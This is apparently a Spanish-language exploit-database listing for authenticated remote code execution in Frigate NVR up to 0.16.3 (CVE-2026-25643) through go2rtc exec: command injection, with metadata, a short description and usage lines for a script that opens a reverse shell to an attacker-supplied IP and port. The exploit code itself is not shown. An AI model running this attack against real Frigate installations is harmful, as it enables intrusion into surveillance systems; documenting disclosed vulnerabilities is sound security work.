
Exploit para RCE autenticado en Frigate NVR mediante inyección de protocolo exec: en go2rtc, automatizando la ejecución de comandos del sistema y la captura de shell inversa.
Título del Exploit: Frigate NVR <= 0.16.3 - Ejecución remota de código
autenticada
Fecha: 2026-02-05
Autor del Exploit: jduardo2704
Página del proveedor: https://frigate.video/
Enlace del software: https://github.com/blakeblackshear/frigate
Versión: <= 0.16.3
CVE: CVE-2026-25643
Aviso: https://github.com/blakeblackshear/frigate/security/advisories/GHSA-4c97-5jmr-8f6x
Las versiones de Frigate hasta la 0.16.3 son vulnerables a la ejecución remota de código
(RCE) a través de la configuración de go2rtc. Un atacante con acceso
autenticado (o sin autenticar si la instancia está expuesta) puede inyectar comandos
del sistema en la configuración de la transmisión usando el protocolo exec:. Este
exploit automatiza la inyección del payload, reinicia el servicio y
captura la reverse shell.
pip install requests pyyaml
python3 frigate_rce.py -u http://target:5000 -U admin -P password -lh YOUR_IP -lp 4444
python3 frigate_rce.py -u http://target:5000 -lh YOUR_IP -lp 4444
Este script es solo para fines educativos y pruebas de seguridad autorizadas.